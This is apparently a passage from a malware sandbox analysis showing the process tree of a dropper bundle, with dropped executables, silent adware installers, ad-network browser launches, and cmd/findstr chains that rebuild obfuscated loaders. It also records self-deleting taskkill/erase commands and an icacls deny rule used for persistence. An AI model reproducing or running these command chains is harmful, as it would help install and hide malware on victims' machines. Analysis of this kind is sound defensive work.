C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:2204
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵PID:2932
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2102ff6cfe07c.exe4⤵
- Loads dropped DLL
PID:2124 -
C:\Users\Admin\AppData\Local\Temp\7zSCB777FE3\Thu2102ff6cfe07c.exeThu2102ff6cfe07c.exe5⤵PID:2200
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu214aaca5625.exe4⤵
- Loads dropped DLL
PID:1432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2156de5489c19.exe4⤵
- Loads dropped DLL
PID:1872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21b9847cb6727.exe4⤵
- Loads dropped DLL
PID:1128
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-BG183.tmp\Thu21b93295136197.tmp"C:\Users\Admin\AppData\Local\Temp\is-BG183.tmp\Thu21b93295136197.tmp" /SL5="$40134,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zSCB777FE3\Thu21b93295136197.exe"1⤵
- Executes dropped EXE
PID:2280 -
C:\Users\Admin\AppData\Local\Temp\is-8F5NT.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-8F5NT.tmp\Setup.exe" /Verysilent2⤵PID:2236
-
C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"3⤵PID:3276
-
C:\Users\Admin\AppData\Local\Temp\BSKR.exe"C:\Users\Admin\AppData\Local\Temp\BSKR.exe"4⤵PID:4448
-
C:\Users\Admin\AppData\Local\Temp\BSKR.exeC:\Users\Admin\AppData\Local\Temp\BSKR.exe5⤵PID:4552
-
-
C:\Users\Admin\AppData\Local\Temp\BSKR.exeC:\Users\Admin\AppData\Local\Temp\BSKR.exe5⤵PID:4656
-
-
-
C:\Users\Admin\AppData\Local\Temp\Mortician.exe"C:\Users\Admin\AppData\Local\Temp\Mortician.exe"4⤵PID:4428
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c cmd < Cerchia.vsdx5⤵PID:3296
-
C:\Windows\SysWOW64\cmd.execmd6⤵PID:5084
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^JdxmflaMoKJKGKEonRKIDlCuNBztuuxobvTVXbusdtKZTUcnQFZrvdHmOhLNQgGwfAjlQJkqLaammCjTuVhBisMuOxuJLaA$" Attesa.vsdx7⤵PID:2620
-
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comImpedire.exe.com I7⤵PID:4708
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I8⤵PID:3184
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I9⤵PID:4352
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I10⤵PID:3820
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I11⤵PID:4116
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I12⤵PID:2664
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I13⤵PID:4032
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I14⤵PID:3376
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping localhost7⤵
- Runs ping.exe
PID:3760
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\foradvertising.exe"C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws14⤵PID:1340
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "foradvertising.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" & exit5⤵PID:3144
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "foradvertising.exe" /f6⤵
- Kills process with taskkill
PID:5080
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe"4⤵PID:5088
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent3⤵PID:3380
-
C:\Users\Admin\AppData\Local\Temp\is-1ELNO.tmp\stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-1ELNO.tmp\stats.tmp" /SL5="$7020E,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent4⤵PID:3772
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-HJG1V.tmp\Thu214aaca5625.tmp"C:\Users\Admin\AppData\Local\Temp\is-HJG1V.tmp\Thu214aaca5625.tmp" /SL5="$60160,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSCB777FE3\Thu214aaca5625.exe"1⤵
- Executes dropped EXE
PID:2348 -
C:\Users\Admin\AppData\Local\Temp\is-PD5S5.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-PD5S5.tmp\46807GHF____.exe" /S /UID=burnerch22⤵PID:2964
-
C:\Program Files\Windows Defender\CRDPXILCAR\ultramediaburner.exe"C:\Program Files\Windows Defender\CRDPXILCAR\ultramediaburner.exe" /VERYSILENT3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2200 -
C:\Users\Admin\AppData\Local\Temp\is-5TTSR.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-5TTSR.tmp\ultramediaburner.tmp" /SL5="$2021C,281924,62464,C:\Program Files\Windows Defender\CRDPXILCAR\ultramediaburner.exe" /VERYSILENT4⤵PID:2240
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu5⤵PID:2736
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\e3-0db9e-8e4-96488-049977fa0b28f\Hicedypova.exe"C:\Users\Admin\AppData\Local\Temp\e3-0db9e-8e4-96488-049977fa0b28f\Hicedypova.exe"3⤵PID:2192
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e64⤵PID:4048
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4048 CREDAT:275457 /prefetch:25⤵PID:3828
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4048 CREDAT:734226 /prefetch:25⤵PID:4348
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad4⤵PID:2848
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2848 CREDAT:275457 /prefetch:25⤵PID:276
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\f1-f701d-0d2-ec294-9a16f61b5df6c\Pyceniwori.exe"C:\Users\Admin\AppData\Local\Temp\f1-f701d-0d2-ec294-9a16f61b5df6c\Pyceniwori.exe"3⤵PID:1924
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ugpftoyg.kr3\GcleanerEU.exe /eufive & exit4⤵PID:4176
-
C:\Users\Admin\AppData\Local\Temp\ugpftoyg.kr3\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ugpftoyg.kr3\GcleanerEU.exe /eufive5⤵PID:4420
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ugpftoyg.kr3\GcleanerEU.exe" & exit6⤵PID:5060
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f7⤵
- Kills process with taskkill
PID:5052
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mbmzqney.lnq\installer.exe /qn CAMPAIGN="654" & exit4⤵PID:4556
-
C:\Users\Admin\AppData\Local\Temp\mbmzqney.lnq\installer.exeC:\Users\Admin\AppData\Local\Temp\mbmzqney.lnq\installer.exe /qn CAMPAIGN="654"5⤵PID:5016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jq133xld.zjz\anyname.exe & exit4⤵PID:4792
-
C:\Users\Admin\AppData\Local\Temp\jq133xld.zjz\anyname.exeC:\Users\Admin\AppData\Local\Temp\jq133xld.zjz\anyname.exe5⤵PID:5024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o34kfzb2.rb1\gcleaner.exe /mixfive & exit4⤵PID:4908
-
C:\Users\Admin\AppData\Local\Temp\o34kfzb2.rb1\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\o34kfzb2.rb1\gcleaner.exe /mixfive5⤵PID:4608
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\o34kfzb2.rb1\gcleaner.exe" & exit6⤵PID:4628
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f7⤵
- Kills process with taskkill
PID:2936
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1n03lcvs.3sz\autosubplayer.exe /S & exit4⤵PID:2976
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCB777FE3\Thu2156de5489c19.exeThu2156de5489c19.exe1⤵
- Executes dropped EXE
PID:2268 -
C:\Users\Admin\AppData\Local\Temp\tmp58F9_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp58F9_tmp.exe"2⤵PID:4000
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe3⤵PID:3108
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Attesa.wmv3⤵PID:4580
-
C:\Windows\SysWOW64\cmd.execmd4⤵PID:4824
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^VksJcWfNcDMqfgfCCoOQaENLrlkioAEZRevWUFgpnuTZyylQxdxsqDodbFGlKiEVZMohRaHWUFajKOGYZxNRyhZgTymgZtndBYqaWXYwInbclWFIZIldx$" Braccio.wmv5⤵PID:5032
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comAdorarti.exe.com u5⤵PID:4100
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u6⤵PID:3408
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u7⤵PID:5056
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping localhost5⤵
- Runs ping.exe
PID:3976
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCB777FE3\Thu214aaca5625.exeThu214aaca5625.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2232
-
C:\Users\Admin\AppData\Local\Temp\7zSCB777FE3\Thu21b9847cb6727.exeThu21b9847cb6727.exe1⤵
- Executes dropped EXE
PID:1220
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2932 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2952
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2212 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2644
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵PID:3148
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3148 CREDAT:275457 /prefetch:22⤵PID:3644
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8F62B175-6B13-4797-AD62-A6E44F54A9F7} S-1-5-21-1669990088-476967504-438132596-1000:KJUCCLUP\Admin:Interactive:[1]1⤵PID:2856
-
C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exeC:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe2⤵PID:4536
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4940 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2128
-
-
C:\Users\Admin\AppData\Local\Temp\60A7.exeC:\Users\Admin\AppData\Local\Temp\60A7.exe1⤵PID:3244
-
C:\Users\Admin\AppData\Local\Temp\CA62.exeC:\Users\Admin\AppData\Local\Temp\CA62.exe1⤵PID:2148
-
C:\Users\Admin\AppData\Local\Temp\CA62.exeC:\Users\Admin\AppData\Local\Temp\CA62.exe2⤵PID:4900
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\e13f26d4-177d-491d-8308-e8044692568a" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:5052
-
-
C:\Users\Admin\AppData\Local\Temp\CA62.exe"C:\Users\Admin\AppData\Local\Temp\CA62.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:4956
-
C:\Users\Admin\AppData\Local\Temp\CA62.exe"C:\Users\Admin\AppData\Local\Temp\CA62.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:984
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\42EC.exeC:\Users\Admin\AppData\Local\Temp\42EC.exe1⤵PID:3356
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:1480
-
C:\Users\Admin\AppData\Local\Temp\B4B2.exeC:\Users\Admin\AppData\Local\Temp\B4B2.exe1⤵PID:3184